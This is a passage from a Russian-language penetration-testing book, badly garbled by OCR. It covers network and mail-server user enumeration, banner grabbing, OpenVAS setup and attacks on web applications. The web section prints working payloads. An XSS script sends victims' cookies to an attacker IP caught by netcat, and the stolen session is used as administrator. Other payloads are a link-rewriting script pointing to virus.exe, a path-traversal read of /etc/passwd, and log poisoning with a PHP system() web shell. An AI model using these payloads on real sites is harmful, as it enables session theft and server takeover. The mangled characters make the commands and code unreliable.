[ + ] Махітит раззмогсІ а§е: 30 сіауз 00 Ііоипз 00 тіпиТез 
[ + ] РаззмопсІ СотрІехіТу Р1а@з: 000000 

[ + ] Оотаіп КеТизе РаззмопсІ СИап§е: в 
[ + ] Оотаіп РаззмогсІ 5Тоге СІеапТехТ: 0 
[ + ] Оотаіп РаззмогсІ ТоскоиТ Асітіпз: 0 
[ + ] Оотаіп РаззмогсІ Мо Сіеап СТап§е: 0 
[ + ] Оотаіп РаззмогсІ Мо Апоп СМап§е: 0 
[ + ] Оотаіп РаззмогсІ Сотріех: в 

[ + ] Міпітит раззмогсІ а§е: Мопе 

[+] КезеТ АссоипТ ТоскоиТ СоипТеп: 30 тіпиТез 


Оезс: 
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[ + ] ЬоскесІ Ассоипі Оигаіііоп: 30 тіпиііез 
[ + ] Ассоипі Ьоскоиі: ТЬгезЬоісІ: Мопе 
[ + ] Рогсесі Ьо§ о-р-р Тіте: N01: 5еі 

[ + ] КеііеѵесІ рагіііаі раззмогсі роіісу иііЬ грссііепіі: 

Раззмогсі Сотріехіііу: РізаЫесі 
Міпітит Раззмогсі Ьеп^ТЬ: в 


бгоирз оп 192.168.126.171 


[+] бе1:1:іп@ Ьиііііп §гоирз: 

§гоир: [Асітіпізіігаііогз] гісі: [0x220] 

§гоир: [биезііз] гісі: [0x222] 

[ + ] бе1:1:іп@ Ьиііііп §гоир тетЬегзЬірз: 

бгоир 'биезііз' (КЮ: 546) Маз тетЬег: ІлІІМ5КѴ\биез1і 

бгоир ’ІІзегз’ (КЮ: 545) Ьаз тетЬег: N1 АІЯНОКІТѴ\ІМЕКАСТІѴЕ 

бгоир ’ІІзегз’ (КЮ: 545) Ріаз тетЬег: N1 АІІТН0КІТѴ\Аи1:Ьеп1:іса1:есІ ІІзегз 

бгоир ’ІІзегз’ (КЮ: 545) Ьаз тетЬег: ЫЮ5КѴ\асітіп 

бгоир 'Асітіпізіігаііогз' (КЮ: 544) Ьаз тетЬег: ЫЮ5КѴ\АсІтіпі5І:га1:ог 

[+] бе1:1:іп@ Іосаі §гоирз: 

[+] бе1:1:іп@ Іосаі §гоир тетЬегзЬірз: 

[ + ] бе1:1:іп@ сіотаіп §гоирз: 

§гоир:[Мопе] гісі: [0x201] 

[ + ] бе1:1:іп@ сіотаіп §гоир тетЬегзЬірз: 

бгоир 'Иопе' (КЮ: 513) Ьаз тетЬег: Іл/Ю5КѴ\АсІтіпі5І:га1:ог 

бгоир 'Иопе' (КЮ: 513) Ьаз тетЬег: Іл/ЮЗКѴХбиезІ: 

бгоир 'Иопе' (КЮ: 513) Ьаз тетЬег: Іл/Ю5КѴ\асІтіп 


| ІІзегз оп 192.168.126.171 ѵіа КЮ сус1іп@ (КЮ5: 500-550Д000-1050) 


[I] РоипсІ пем 5Ю: 5-1-5-21-1606980848-73586283-839522115 
[I] РоипсІ пем 5Ю: 5-1-5-32 

[+] ЕпитегаЫп§ изегз изіп§ 5Ю 5-1-5-21-1606980848-73586283-839522115 апсі 1о§оп 
изегпате раззмогсі '' 

5-1-5-21-1606980848-73586283-839522115-500 ЫЮ5КѴ\АсітіпІ5І:га1:ог (Юсаі Цзег) 
5-1-5-21-1606980848-73586283-839522115-501 ЫЮ5КѴ\6иез1: (Юсаі Іізег) 

5-1-5-21-1606980848-73586283-839522115-512 *ипкпомп*\*ипкпомп* (8) 
5-1-5-21-1606980848-73586283-839522115-513 ИЮ5КѴ^опе (Оотаіп бгоир) 

Итак, мы смогли получить очень много интересной информации — имена поль¬ 
зователей, версии установленного ПО, список сетевых дисков и даже политики 
безопасности. На наш взгляд, вся полученная информация является критичной 
и в разы упрощает задачу злоумышленнику при взломе системы. 
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Работа с электронной почтой 

В наши дни электронная почта является одним из основных инструментов ве¬ 
дения бизнеса. Даже в небольших организациях у каждого сотрудника имеется 
персональный е-шаіі. Спектр его применения достаточно широк — внутренняя 
коммуникация, пересылка документов, общение с клиентами, переписка с партне¬ 
рами и многое другое. Сотрудники часто используют почту в личных целях, что 
является весьма рискованным с точки зрения информационной безопасности, но 
хорошо для взломщика. 

Есть несколько способов получения списка е-таіі адресов компании. Один из них 
мы уже рассмотрели в предыдущей главе. 

Второй способ не очень надежный. Он основывается на том, что администрато¬ 
ры не отключают «ѵегеГу» и «схрп» на своих серверах. Это приводит к тому, что 
злоумышленник может проверить список собранных почтовых адресов или даже 
подобрать их в автоматическом режиме. 

ЕХРИ используется для получения всех получателей письма. Например, если 
письмо предназначено (1ах@аД.сот, но в настройках сервера указано, что его надо 
переслать ба$@ас1.сот и 8<:1@<:1(|.сот, то злоумышленник получит в том числе и по¬ 
следние два адреса. 

гооГ@ка1і:~# ГеІпеГ тх.іЬох.Іѵ 25 
Тгуіпе 194.152.31.73... 

СоппесГесІ Го тхі . іпЬох. 1ѵ. 

Е5саре сЬагасГег І5 ’ Л ]'. 

220 Гітту2-1ѵ.ІпЬох.1ѵ Е5МТР 
ѴКРѴ гооГ 

502 5.5.1 ѴКРѴ соттапсі І5 сІІ5аЫесІ 
ЧиіГ 

221 2.0.0 Вуе 

СоппесГіоп сіойѳсі Ьу Гогеі§п Мозг. 

гооГ@ка1і:~# ГеІпеГ тх.асіЬ.сот 25 
Тгуіп§ 216.46.24.12... 

СоппесГесІ Го тх.асіЬ.сот. 

Е5саре сЬагасГег І5 ’ л ]'. 

220 Гітту2-1ѵ.ІпЬох.1ѵ Е5МГР 
ѴКРѴ гооГ 

250 2.1.5 гооГ <гооГ@ тх.аЬЬ.сот> 

ѴКРѴ апсіегзоп 

550 5.1.1 апсіегзоп... ІІзег ипкпомп 
ЧиіГ 

221 2.0.0 Вуе 

СоппесГіоп сіойесі Ьу Гогеі§п Ьо5Г. 

В первом случае мы видим ответ сервера, на котором отключена возможность про¬ 
верки пользователей, тогда как во втором случае администраторы не позаботились 
о тонкой настройке почтового сервиса. 
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Пример работы ЕХР№ 

гооі@ка1і :~# іеіпеі тх.іЬох.Іѵ 25 
Тгуіп§ 10.34.15.1... 

СоппесіесІ То 10.34.15.1. 

Егсаре сНагасіег іа " Л ]'. 

220 туНозі Е5МТР Зепсітаіі 8.9.3 
НЕЮ 

501 НЕЮ гериігеа сіотаіп асісігеаа 
НЕЮ х 

250 туНозі Неііо [10.34.15.5], ріеааесі іо тееі уои 
ЕХРЫ ЬоЬ 

250 Зирег-ІІаег ЬоЬ@туог§.пеі 

250 Міке 5іогт <тіке5іогт@туог§.пеі> 

ЕХРМ аіісе 

550 аіісе... ІІаег ипкпомп 

Подбор пользователей с использованием К.СРТ-ТО: 

гооі@ка1і:~# іеіпеі тх.аооіе.сот 25 
220 аегѵегі Е5МТР Зепсітаіі 8.9.3 
НЕЮ 

501 НЕЮ гериігеа сіотаіп асісігеаа 
НЕЮ х 

250 аегѵегі Неііо [10.0.0.72], ріеааесі іо тееі уои 

МАИ РКОМ:атііІі 

250 атііИ... Зепсіег ок 

КСРТ ТО:тіке 

250 тіке... Кесіріепі ок 

КСРТ ТО: гоЬегі 

550 гоЬегі... ІІаег ипкпомп 

Есть еще один интересный способ получить больше информации об адресате. Сервис 
\УЪоКеасІМе позволяет определить тип операционной системы, браузера, а также 
установленные компоненты АсйѵеХ и даже примерное местоположение адресата. 


Анализ баннеров 

Зайдем немного дальше простого сканирования портов и определения типа запу¬ 
щенных сервисов. Баннер — это информация, предоставляемая сервисом о самом 
себе. Получив его, можно узнать много полезной информации — название, уста¬ 
новленную версию и многое другое. Бывает, что опытные администраторы меняют 
баннер таким образом, чтобы направить атакующего по ложному следу, например 
занижают версию установленного сервиса. 

С данной задачей отлично справляется мультиплатформенная утилита іеіпеі. 

Попробуем получить баннер НТТР-сервера: 

гооі@ка1і:~# іеіпеі гИІ.сот 80 
Тгуіп§ 64.64.27.93... 

СоппесіесІ іо гШ.сот. 

Е5саре сНагасіег із ’ Л ]'. 
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6ЕТ 

НТТР/1.1 400 ВасІ Келие5* 

РаТе: ТИи, 16 Осі 2016 16:08:23 СМТ 
Зегѵег: АрасНе 2.2.16 
Соппесііоп : сіозе 

Сопіепі-Туре : ГехГ/ШтІ; с(іаг5е1:=і50-8859-1 

Как мы видим, удалось получить информацию об установленном сервере, его вер¬ 
сии и системном времени. 

Есть и более удобные утилиты: 

□ №ГсгаЙ — рассмотренный ранее онлайн-сервис, позволяющий получить много 
полезной информации; 

□ ХргоЬе — утилита для сбора информации о целевой системе; 

□ Роі — анализирует трафик, полученный от целевой системы, имеет множество 
фильтров; 

□ Маіі едо — поможет с визуализацией полученной информации. 


Получение информации от ІМТР-сервера 

Очень часто, особенно в крупных организациях, локальные КТР-серверы исполь¬ 
зуются для синхронизации времени серверов и компьютеров в локальной сети. 

При помощи N М А Р можно не только узнать точное время, но и получить список 
последних 600 хостов, которые синхронизировали время с этим сервером. 

Это может быть очень полезно, если вы еще не знаете всей структуры сети, так как 
КТР-ссрвер обычно доступен с любого хоста любой подсети. 

гоо1:@ка1і:~# птар -5ІІ - рі) : 123 -Рп -п --5СГІр1:=п1:р-топ1І5І: 192.168.127.3 

РОКТ 5ТАТЕ 5ЕКѴІСЕ КЕА50М 
123/исІр ореп пір исір-гегропзе 
| пТр-топИзТ: 

Таг@еі І5 зупсИгопізесІ міТИ 34.127.56.0 (геТегепсе сіоск) 

Аііегпаііѵе Таг@еі: Іпіег-Расез: 

10.0.4.20 

Ргіѵаіе 5егѵега (0) 

РиЫіс 5егѵегз (0) 

Ргіѵаіе Реег5 (в) 

РиЫіс Реегз (0) 

Ргіѵаіе Сііепіз (2) 

10.0.8.35 169.254.138.55 

РиЫіс Сііепіз (597) 

192.168.127.173 192.168.125.15 192.168.125.33 192.168.127.46 


ОіИег А550сіа1:іоп5 (1) 

127.0.0.1 аееп 1853569 іітез. Іа51: іх маа ипісазі: ѵ2 тосіе 7 
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Поиск уязвимостей 

Итак, мы нашли сервер, к которому можем получить доступ. Обычно для 
несанкционированного подключения используют уязвимости в установленном ПО. 
Но как определить, какие уязвимости присутствуют на удаленной машине, а ка¬ 
кие — нет? Можно попытаться найти уязвимости вручную, используя полученную 
информацию и базы данных уязвимостей. Однако это очень долгий и трудоемкий 
процесс. И тут нам на помощь приходят сканеры уязвимостей. 

Самые популярные из них — №ззш, ОрепѴАЗ, Кейпа и №хрозе. Они позволяют не 
только находить открытые уязвимости в установленном ПО и ОС, но и определять 
устаревшие протоколы шифрования, зараженные компьютеры и многое другое. 

Эти инструменты предназначены не только для злоумышленников, но и для адми¬ 
нистраторов, желающих улучшить безопасность своей инфраструктуры. 

Например, ОрепѴАЗ входит в состав Каіі О них и даже доступен из репозиториев, 
но почему-то не установлен. 

Для установки выполним следующие шаги: 

□ Убедитесь, что в файле /еіх/арі/зоигсез.іізі: присутствует строка беЪ Ьйр:// 
Ьйр.каіі.ог^/каіі ка1і-го11іп§ шаіп сопігіЪ попДгее, — это репозиторий Каіі Ьіпих. 

□ Обновите ОС и установите ОрепѴАЗ: 

гооТ@ка1і :~# арТ-^еІ: ирсіаіе 
гооТ@ка1і :~# арТ-^еІ: сіізТ-ир^гасіе 
гооТ@ка1і:~# арТ-^еІ: іпзіаіі орепѵаз 
гооТ@ка1і:~# орепѵаз-зеіир 
/ѵаг/ІіЬ/орепѵаз/ргіѵаТе/СА сгеаТесі 
/ѵаг/НЬ/орепѵаз/СА сгеаТесІ 

[і] ТНіз зсгірі зупсіігопігез ап МѴТ соІІесТіоп міТМ ТРіе 'ОрепѴАЗ [МѴТ РеесГ . 

[і] Опііпе іпТогтаТіоп аЬоиТ ГНіз -РеесІ: ' ЩТр ://ммм. орепѵаз. ог§/орепѵаз-пѵ1:--Реесі 

зепТ 1143 ЬуТез гесеіѵесі 681712356 ЬуТез 1646224.34 ЬуТез/зес 
ТоТаІ зіге І5 681651040 зреесіир із 1.00 
[і] Іпі1:іа1І2Іп§ зсар сІаТаЬазе 
[і] ІІргіаТіп^ СРЕЗ 

[і] ІІргіаТіп^ /ѵаг/1іЬ/орепѵаз/зсар-сІа1:а/пѵсІсѵе-2.0-2002.хті 
[і] ІІрсіаПп^ /ѵаг/1іЬ/орепѵаз/зсар-сІа1:а/пѵсІсѵе-2.0-2003.хті 

ІдІгіТе оиТ сіаТаЬазе иНМ 1 пем епігіез 
РаТа Ваге ІІрсіаГесі 

гпсі таіп: РЕВІІС: 14364:2016-10-20 23И06.33 ЕРТ: зр1_ореп: сІЬ ореп, тах геТгу 

зіеер Тіте із 0 

КеЬиі1<1іп§ МѴТ сасИе... сіопе. 

ІІзег сгеаіесі міТІі раззмогсі ' 15Ь859ТсІ-Ьа8сІ-4186-Ь403-641сі879е6567' . 

□ Убедитесь, что необходимые сервисы работают: 

гооТ@ка1і:~# пеТзТаТ -апір 

АсТіѵе ІпТегпеІ: соппесТіопз (зегѵегз апсі езТаЫізМесі) 
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РгоТо І_оса1 Асігігезз 5ТаТе 
Тер 127.0.0.1:9390 І.І5ТЕЫ 
Тер 127.0.0.1:9391 ИЗТЕЫ 
Тер 127.0.0.1:80 ЕІ5ТЕЫ 
Тер 127.0.0.1:9392 ИЗТЕЫ 


РЮ/Рго§гат пате 
14566/орепѵа5тсІ 
14535/орепѵа55сІ : Иа 
14578/§5асІ 
14575/§5асІ 


□ И запустите ОрепѴАЗ: 

гооТ@ка1і:~# орепѵа5-5ТагТ 
5ТагТіп§ ОрепѴаз Бегѵісез 


В дальнейшем вы сможете подключиться к веб-интерфейсу ОрепѴАЗ, используя 
браузер, в адресную строку которого необходимо ввести Ьттря://127.0.0.1:9392. Имя 
пользователя асітіп, пароль был сгенерирован автоматически во время установки. 

Теперь достаточно ввести ІР-адрес интересующего хоста или подсети и изучить 
отчет. 


СгеепЬопе Зесигіеу АггІБіапі - МогІІІа РІгеГох О Ѳ О 

СгсспЬолс Бссигііу А... к \ + 

♦ )^)®а Іі11рь://127.0.0.19392/иііір?і=1&1цкеп=с7гі18029-3 ЕР С 110. ЗелЧі | Ѳ © •»• * = 

(зЗМслі Ѵыіес] т |)|ОГГепьіѵе Бесигііу \КаІіІіпих \КаІі Ооо;» \КаІіТоЫѵ ЦЕхрІоіІ-ОВ \Аігсг4ск-мц 



Рис. 3.1. ОрепѴАЗ — стартовая страница 
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Учтите, что ОрепѴАЗ — очень мощный инструмент, и мы рекомендуем затратить 
некоторое время на его самостоятельное изучение. 


/ & (згсспьопс Ьссигйу А... к \ ■* 


бгсспЬопс 5 ссигі*у АззізСапі - Моііііа Рігс^ох 


о © о 


( ^ [ ф й ІіІІрз://127.0.0.1:9392/опір?стсІ=деІ-гезцІЬ&ГіИег = 


зеѵ | С О. Зеагсіі 


☆ е о * * = 


|^] МозС ѴічЯегі ▼ |ДСЖрпзіѵр Яепігйу \КаІіІіпих \КаІіГ>ос<; \КаІіТооІз ЦРхрІоіС-ПВ \Аігггагк-пд 


СгеепЬопе 

5есугі!у АззізІапІ 


Щ I оддеН іп д<; Асітіп асітіп | ІодопС 
Ргі ОсС 21 05:13:18 2016 ШС 


Зсап Мападстспі Аізсі Мопадстспі ЗссІпГо Моподстспі СопбдигаІІоп 


ПеэиІСэ ■■ 1 - 10 о* 27 (СоСаІ: 46) I 


ГіІСег: |5СѴСгИу>кггогап(Иа5К.і(і=с2Ц/8ГсЬ Пйі 4(Ш 8Ь0с 2ШЬс4Ь448| 0 Ц ^ 

іогі-гѵЛ ЙгвС-І голз-10 



о Р^іав 


( Бсѵсгісу 



55Н РгоіосоІ ѵегьіопз БііррогеесІ 
НТТР Яргѵрг Сурр япгі ѵргчіоп 
нмр ьсгѵсг Суре апй ѵсгзіоп 
55Н Яргѵрг Сурр япН ѵргѵоп 
імв І'йаз і. ѵѵгаорс г) 

Г1ІЯВ (N451 шаррм) 

Ьегѵіссс 

5нѵісе 

5егѵісе5 

5егѵісеѵ 


САррІіс-^ бііег. 5€ѵегі1у>Сггог опгі Іо5к_ігі-с2Э7(Лс5-С0(Л-4Рй9-050с-21116с4(і4405 зогС-пѵС РгзІ-1 готѵз-101 


НоаС 


1.осаІіоп 

СгеаСеЗ 

8 

.23 

.50.90 

22/Сср 

РГІ ОСС 21 04:52:09 2016 

Я 

.71 

.50.90 

441/Ігр 

Ргі От! 21 04:52:15 2010 

0 

.23 

.50.90 

водер 

РГІ ОСС 21 04:52:15 201Ь 

8 

.23 

.50.90 

??Дгр 

Ргі ОсС 71 04:52:08 701 Г. 

8 

.23 

.50.90 

443Дср 

РГІ ОСС 21 04:34:19 2016 

8 

.23 

.50.90 

ЯП/1 с |) 

Ргі Ос 1 71 04:54:77 7016 

8 

.23 

.30.90 

22ДСР 

РГІ ОСС 21 04:31:41 2016 

8 

.23 

.50.90 

443Дср 

Ргі ОсС 21 04:51:41 2016 

8 

.23 

.50.90 

443Дср 

Ггі ОсС 21 04:51:41 2016 

8 

.23 

.50.90 

80/1ср 

Ріі ОсС 21 04:51:45 2016 


| ѴАррІу «о р>д«соп<«гИі У И У 
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Рис. 3.2. ОрепѴАЗ — пример отчета по результатам сканирования 


Резюме 

Важно осознавать, что все, что происходит на данном этапе, может быть замечено 
администраторами целевой системы. Если это случится, то они наверняка попро¬ 
буют помешать вам в проведении дальнейших действий. 

Сканирование портов: 

□ Определите все активные хосты в сети. 

□ Лучше проводить с использованием специальных программ. 

□ Сканируйте, используя СОР и ТСР протоколы. 

□ Пробуйте разные режимы. 

□ Не торопитесь, делайте паузы между сканированиями, оставайтесь незамечен¬ 


ными. 
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Получение информации от сетевых сервисов 


Постарайтесь получить всю возможную информацию от Г)Х8 сервера. Не ограни¬ 
чивайтесь только записями типа А, найдите и другие — МХ, ТХТ и т. д. Попробуйте 
подобрать БК 5 записи и осуществить передачу зоны. 

Не пренебрегайте сканированием, используя протоколы 8і\’ М Р и \еі:В 108. Они 
до сих пор используются во многих компаниях. 

Знание почтовых адресов организации может оказаться очень хорошим подспо¬ 
рьем — попробуйте подобрать их. 

Внимательно проанализируйте баннеры сетевых сервисов — в них может содер¬ 
жаться информация о версии и название. 

Используйте автоматизированные средства для поиска уязвимостей (ОрепѴАЗ, 
№5 $ш), они помогут вам в сборе дополнительной информации и представят полу¬ 
ченные данные в удобном для анализа виде. 




Атаки на веб-приложения 


Итак, предположим, что в ходе сбора информации о целевой организации мы 
обнаружили веб-приложение. На самом деле можно высказаться иначе: будет 
очень странно, если в ходе сбора информации вы не обнаружите ни одного веб¬ 
приложения. Так что же это такое? Веб-приложением можно назвать все что угод¬ 
но, главный принцип — приложение запускается на стороне сервера, а для доступа 
к нему используется клиент. Это может быть домашняя страничка организации, 
веб-интерфейс для просмотра корпоративной почты, онлайн-система мониторинга 
или браузерный чат, все это — веб-приложения. 

Популярность таких приложений постоянно растет. И это легко понять — кросс¬ 
платформенные, многопользовательские, не требующие клиентских вычисли¬ 
тельных мощностей и вместе с тем необыкновенно функциональные. Крупные 
организации обычно держат свои ресурсы на собственных серверах, и, разумеется, 
к этим серверам есть доступ у любого человека. Ведь нет смысла создавать публич¬ 
ную страничку организации, чтобы впоследствии закрыть пользователям доступ 
к ней. Это и делает их самой популярной мишенью для атак. 

Если раньше веб-странички были сверстаны на НТМЬ и представляли собой не что 
иное, как простой документ, то теперь практически любой сайт является сложным 
программным продуктом с множеством подключаемых модулей. Программный 
код выполняется на стороне сервера, а пользователю выдается только результат 
его работы. 

Взлом веб-приложения становится возможным по двум причинам: 1) это программ¬ 
ный комплекс, который, как и любой другой, может быть взломан; 2) чем больше 
программного кода, тем выше вероятность наличия ошибки в нем. 

Знакомство с соокіе 

Взглянем ближе на такую, казалось бы, банальную вещь, как соокіе. Важность 
соокіе нельзя преуменьшить, так же как и возможные риски и потери, связанные 
с возможностью использования их злоумышленниками для своих атак. 


68 Глава 4 


Атаки на веб-приложения 


Все более-менее большие сайты начинают когда-то пользоваться соокіе. Исходя из 
нынешнего положения вещей, это практически неизбежно. Приведем небольшой 
пример. Возьмем самый обыкновенный интернет-магазин. Пользователь просма¬ 
тривает каталог товаров и добавляет один из них в корзину. На этой стадии интер¬ 
нет-магазин уже создает на его компьютере, без ведома пользователя, соокіе-файл. 
Этот файл будет содержать в себе как минимум информацию о товарах в корзине. 
Эта необходимость обусловлена тем, что веб-приложению нужно где-то хранить 
информацию о действиях пользователя. Ведь практически каждый раз, когда по¬ 
купатель нажимает на какую-либо кнопку на страничке, приложение на стороне 
сервера запускается заново. И оно должно делать это, имея в распоряжении все 
данные, предоставленные пользователем в течение данной сессии, а также инфор¬ 
мацию, сгенерированную самим сервером. Чтобы не тратить ресурсы предприятия, 
для хранения этого массива информации на стороне клиента создается соокіе-файл. 
В нем может храниться не только информация о товарах, но и данные, необходимые 
для аутентификации, а также персональные данные и история прошлых сессий. 

Структура соокіе-файла достаточно проста. Это обычный текстовый файл, в кото¬ 
ром данные представлены в формате «параметр = значение». Данные этого файла 
могут передаваться с использованием ЗЗЬ-протокола, однако данные из файла, 
созданного, например сайтом тусогр.ог§, не могут быть прочитаны другим веб¬ 
приложением, работающим на другом домене, предположим туізр.пек 

Что же можно сделать с этим файлом? Его можно украсть. Для этого очень часто 
используют ХХ5, который будет рассмотрен далее. Заменив свой соокіе-файл 
файлом жертвы, можно без проблем работать от ее имени. 

Также, проанализировав сам файл, можно попробовать менять значения в нем, 
пытаясь таким образом получить более высокие привилегии или даже доступ 
к административной части сайта. 


Межсайтовый скриптинг (Х55) 

Х53 — тип атаки на пользователя, который осуществляется благодаря включению 
в веб-приложение кода злоумышленника. Чаще всего такому типу атак подвержены 
приложения, в которых отсутствует проверка введенных пользователем данных. 
Скажем, при регистрации пользователь может ввести в поле «имя» не только 
буквы, но и специальные символы, такие как «№» или «*», хотя в имени не может 
быть специальных символов. 

Чаще всего злоумышленники используют фіѵаЗсгірі: или РІазЬ, но учитывая раз¬ 
нообразие поддерживаемых браузером технологий, это может быть что угодно. 
Самыми частыми целями такого типа атак являются: кража соокіе-файла поль¬ 
зователя, взаимодействие с передаваемой во время сессии информацией, а также 
перенаправление пользователя на другой сайт. 

Для демонстрации данного метода найдем, используя ранее рассмотренный метод, 
сайт с гостевой книгой и полем для ввода. Используя запрос в СооДе наподобие 
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«^иезШоок іпШІехоттепѣ», находим минут за пятнадцать форму гостевой книги, 
где данные во время ввода не проверяются. 



Рис. 4.1. Форма ввода без проверки данных 



Рис. 4.2. Сообщение, полученное после отправки новой записи в гостевую книгу 
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Атаки на веб-приложения 


Перенаправление браузера. Что же полезного может сделать злоумышленник, 
кроме как пугать пользователей сайта всплывающими окнами? Например, можно 
заставить пользователя скачать файл. 

Для этого создадим аналогичным способом на сайте невидимую область и вставим 
туда ссылку на файл. 

сіГгате 

5КС=" ІгЫірз : //сіомпіоасі.Гі1е2І11а-ргозес1;.ог§/с1іеп1;/Рі1е2і11а_3. 22. 1_міп32-5е1;ир_ 
ЬипсНесІ.ехе" 

Неі§Н1:="100" місІ1;Рі="100"></і-Ргате> 

Теперь, когда пользователь зайдет на скомпрометированную страницу, браузер 
автоматически предложит ему скачать указанный файл. 

Кража соокіе. Как мы говорили ранее, при помощи Х55 можно украсть соокіе- 
файл. Для этого нам понадобятся: 1) уязвимая форма; 2) утилита пеГсаГ, позво¬ 
ляющая взаимодействовать в интерактивном режиме с любым сетевым сервисом 
(может выступать как в роли сервера, так и в роли клиента); 3) пользователь, на 
котором мы все это проверим. 

После того как мы нашли сайт, на котором нет проверки введенных данных и ко¬ 
торый хранит все данные в соокіе-файле, подготовим место, куда будет приходить 
информация от пользователей. Для этого заставим пеГсаГ выступить в роли сервера 
и принимать соединения на порту 80. 

пс -піѵр 80 

Далее создадим скрипт и уже знакомым нам способом загрузим на сайт. 

<5СГІрТ> 

пем Іта§е( ). 5гс=" ІгЫір : //122.18.110.30/апу. р!ір?ои-1:ри1:="+сІоситеп1:. соокіе; 

</5СГІр1:> 

После того как пользователь зайдет на страничку, сразу же произойдет соединение 
с заранее подготовленным пеісаі’ом, и мы получим нужную информацию. 

гоо1@ка1і:~# пс -піѵр 80 
1 із1:епіп§ оп [апу] 80 ... 

соппесі То [122.18.110.30] Г ГОШ (ІІІЧКШШ) [83.165.32.18] 49455 
6 ЕТ /апу. рИр ?оиТри1;=РНР5Е55ІО=316сІ4647сІе53486с2с005811065 НТТР/1.1 
АссерТ: */* 

КеГегег: ШГр://127.0.0.1/л.пс1ех.р11р 


Теперь у нас есть идентификатор сессии. Можно найти соответствующий соокіе 
и поменять его вручную или же воспользоваться плагином. В данном случае мы 
используем «Соокіез Мапа§ег+». 

Сохранив изменения и обновив страницу, мы сможем пользоваться данным сайтом 
с правами администратора. Однако учтите, что, захватив один раз сессию, ею нельзя 
пользоваться постоянно — только до тех пор, пока пользователь или система ее не 
закроют. 
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Рис. 4.3. Изменение данных при помощи «Соокіез Мападег+» 
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оІ5 ЩЕхрІоіІ-ОВ ^Лігсгаск-пд 
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Ргот уоиг ассоипі сЗазПЬоагсІ уои сап ѵіеѵ/ ѵоиг гесепі огйегв. 
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О, гіоѵѵпіоасі ііісгіііа 


Рис. 4.4. Профиль администратора сайта 
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Атаки на веб-приложения 


Отраженный Х88. Этот вариант немного сложнее предыдущего. Обычно, исполь¬ 
зуя данную уязвимость, атака на пользователя происходит через такие каналы, как 
электронная почта или форумы. 

Суть заключается в том, что злоумышленник помещает код в НТТР-ответ леги¬ 
тимного сайта. 

^ТТр://а11§ате5.сот/іпсІех.рІ'ір?и5ег=<5сгір1:>иіпсІом.оп1оасІ = -РипсТіопО {ѵаг 
А11ІЛпк5=сІоситеп-|: . §еТЕ1етегѵІ;5ВуТа§Ыате("а") ; 

АІНіпкДѲ] . НгеР = "ЛТРр://сотрготі5есІ5ІРе.сот/ѵіги5.ехе"; }</зсгірР> 

Пользователь, который получает данный линк, видит только его первую часть 
и понимает, что тот ведет на знакомый и, казалось бы, безопасный сайт. Но 
после того, как пользователь перейдет по ссылке во время открытия сайта, ко¬ 
торому он доверяет, ему будет предложено скачать файл, что он, скорее всего, 
и сделает. 

Однако надо учесть, что данный файл будет предложено скачать не всем посети¬ 
телям сайта, а только тем, кто перейдет по правильно сформированному линку. 


Включение локальных или удаленных файлов 

Зачастую из-за плохо написанного РНР-кода и некорректно сконфигурированного 
веб-сервера у злоумышленника появляется возможность включить данные из ло¬ 
кального или находящегося на удаленном сервере файла в исполняемый РНР-код. 

Самый лучший вариант для атакующего — когда система позволяет брать данные 
из локального файла. В этом случае задача взлома сервера станет тривиальной 
и легко решаемой. 

Вначале посмотрим, как все работает на стороне сервера. Предположим, что на 
сайте есть возможность менять цветовую палитру. Для этого программист написал 
следующий код: 

<?рНр 

ІР ( І55еР( $_СЕТ[ ТОШК* ] ) ) { 

Іпс1ис1е( $_СЕТ[ ’СОШК’ ] . ' .рМр' ); 

} 

?> 


<Рогт теРНосІ="§еР"> 

<5е1есР пате="СОЕОК"> 

<орРіоп ѵа1ие="гесІ">гесІ</орРіоп> 
<орРіоп ѵа1ие="§гееп">§гееп</орРіоп> 
<орРіоп ѵа1ие="Ыие">Ыие</орРіоп> 
</зе1есР> 

< іприТ; Руре="5иЬтіР"> 

</Рогт> 
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Обратите внимание на то, что введенные данные никоим образом не проверяются. 
Изменения происходят сразу же, как только пользователь выберет цвет. 

Теперь, если мы правильно сформируем запрос, то сможем получить хеши паролей 
с сервера под управлением ОС Ілніх. 

Ы;1;р://сІиттуИо5І;.пе1;/ргеѵіем.рИр?-( : і1е=. ./еТс/раззис! 

гооТ: х: 0:0: гооТ : /гооі; :/Ьіп/Ьа5Ь 
Ьіп :х: 1:1: Ьіп: /Ьіп:/5Ьіп/по1о§іп 
сіаетоп :х: 2:2: Ьаетоп: /5 Ьіп : / 5Ьіп/по1о§іп 
ЬоЬ :х: 500:500: ЬоЬ: / Моте/ ЬоЬ :/Ып/ЬазЬ 
а!ісе:х:501:501::/ Ноте/а Іісе: /Ьіп/ЬааЬ 


Но иногда такой метод может и не сработать. Если вы внимательно читали приве¬ 
денный выше код, то могли заметить, что сервер ждет на входе файл с расширением 
рЬр. Следовательно, наш запрос немного преобразится: 

ЫТр: //сІиттуИозТ . пеі/ргеѵіем. рЬр?-Рі1е=. . /еіс/раззмсі.рЬр 

А это значит, что попытка окажется неудачной, ведь в системе нет такого файла, 
как раяяѵѵсі.ріір. Если вы столкнулись с такой ситуацией, проблему можно решить 
добавлением в конце строки %00. 

Ы:1:р://сІиттуЬо5і:.пе-1:/ргеѵіем.рЬр?-Рі1е=. . /е1:с/ра55исІ%00 

Однако не всегда можно сразу получить хеши паролей. Попробуем получить до¬ 
ступ к командной строке сервера. Тут мы сразу же сталкиваемся со следующей 
проблемой — на сервер не загружен файл с нужным кодом. 

Вся прелесть в том, что мы можем заставить сервер записать наш код в один из 
своих локальных файлов, а затем просто сформируем нужный запрос. 

Используя пеісаі:, подключимся к удаленному серверу и в качестве запроса отпра¬ 
вим написанный заранее код. Конечно, сессия завершится ошибкой, ведь сервер 
не сможет обработать наш запрос, однако и запрос, и сообщение об ошибке будут 
сохранены в лог-файл. Мы знаем его точное месторасположение, а это значит, что 
все содержимое лог-файла, в том числе и наш код, будет включено в исполняемый 
файл и выполнено. 

гооТ@ка1і :~# пс ІосаІЬозі: 80 

6ЕТ /< РрИр 5у5І:еп($_0ЕТ[ ' стсі ' ]); ?> 

НТТР/1.1 404 N 0 * Роипсі 

РаГе: Моп, 01 5ер 2016 22:00:34 6МТ 

5егѵег: АрасЬе/2.4.7 (ІІЬипТи) 

СогтЬегѵЬ - Ееп§1:Гі : 276 Соппесііоп: сіозе 
Сопіепі-Туре: Іехі/Ыті; сІіаг5е-(:=І50-8859-1 
СЮОСТѴРЕ НТМЬ РІІВИС "-//ІЕТР//ОТО НТМІ_ 2.0//ЕМ"> 
сШтІхРіеасЬ 
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<1:і1:1е>404 N01: РоипсІ</1;іТ:1е> 

</НеасІ><ЬосІу> 

